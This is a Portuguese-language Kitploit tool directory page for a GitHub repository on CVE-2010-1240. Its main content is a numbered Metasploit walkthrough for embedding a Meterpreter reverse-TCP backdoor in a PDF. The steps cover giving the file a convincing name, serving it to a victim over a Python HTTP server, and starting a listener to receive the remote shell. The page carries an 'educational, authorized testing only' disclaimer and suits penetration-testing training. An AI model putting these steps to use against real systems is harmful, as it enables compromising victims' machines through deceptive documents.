Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2010-1240 — Prova de conceito educacional demonstrando como incorporar um backdoor Meterpreter em um arquivo PDF explorando CVE-2010-1240, com instruções passo a passo do Metasploit para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/asepsaepdin/cve-2010-1240
Ferramentas de PhishingFrameworks de ExploraçãoExploração de Aplicações WebTestes de PenetraçãoEngenharia SocialDesenvolvimento de Payloads
GitHubasepsaepdin/cve-2010-1240

CVE-2010-1240

Prova de conceito educacional demonstrando como incorporar um backdoor Meterpreter em um arquivo PDF explorando CVE-2010-1240, com instruções passo a passo do Metasploit para testes de segurança autorizados.

Ver Repositório
1153há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2010-1240 - Incorporando backdoor em um PDF

Python


⚠️ Apenas para fins educacionais e de pesquisa de segurança autorizada

Descrição

O Adobe Reader e o Acrobat 9.x anteriores à versão 9.3.3, e 8.x anteriores à 8.2.3 no Windows e Mac OS X, não restringem o conteúdo de um campo de texto na caixa de diálogo de aviso do Launch File, o que facilita que atacantes remotos enganem usuários a executar um programa local arbitrário especificado em um documento PDF, como demonstrado por um campo de texto que afirma que o botão Open permitirá ao usuário ler uma mensagem criptografada.

Demonstração

Animation

Guia de Passos

  1. Primeiro, execute o msfconsole

    root@kitploit:~
    msfconsole
    
  2. Em seguida, defina o payload para incorporar o pdf

    root@kitploit:~
    use exploit/windows/fileformat/adobe_pdf_embedded_exe
    
  3. defina a opção INFILENAME e forneça o caminho direto para o arquivo pdf original

    root@kitploit:~
    set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
    
  4. defina o nome do novo arquivo PDF malicioso para algo mais convincente, definindo a opção FILENAME

    root@kitploit:~
    set FILENAME laporan.pdf
    
  5. Encontre e incorpore o payload no arquivo PDF

    root@kitploit:~
    set payload windows/meterpreter/reverse_tcp
    
  6. Defina a opção LHOST para o IP do atacante

    root@kitploit:~
    set LHOST 172.16.10.10
    
  7. Abra um novo terminal e navegue até o local do arquivo PDF malicioso

    root@kitploit:~
    cd .msf4/local/
    
  8. Crie um servidor temporário em python

    root@kitploit:~
    python -m http.server
    
  9. Baixe o arquivo PDF malicioso na máquina da vítima

    root@kitploit:~
    http://172.16.10.10:8000/certificate.pdf
    
  10. Antes de executar o arquivo PDF malicioso na máquina da vítima, inicie o listener no terminal anterior

    root@kitploit:~
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 172.16.10.10
    exploit
    
  11. Assim que o arquivo PDF malicioso for executado na máquina da vítima, você obterá conexão com a máquina da vítima

Créditos

  • https://nvd.nist.gov/vuln/detail/CVE-2010-1240
  • https://medium.com/purple-team/embedding-backdoor-into-pdf-files-1781dfce62b1
  • https://github.com/Jasmoon99/Embedded-PDF
Baixar ferramenta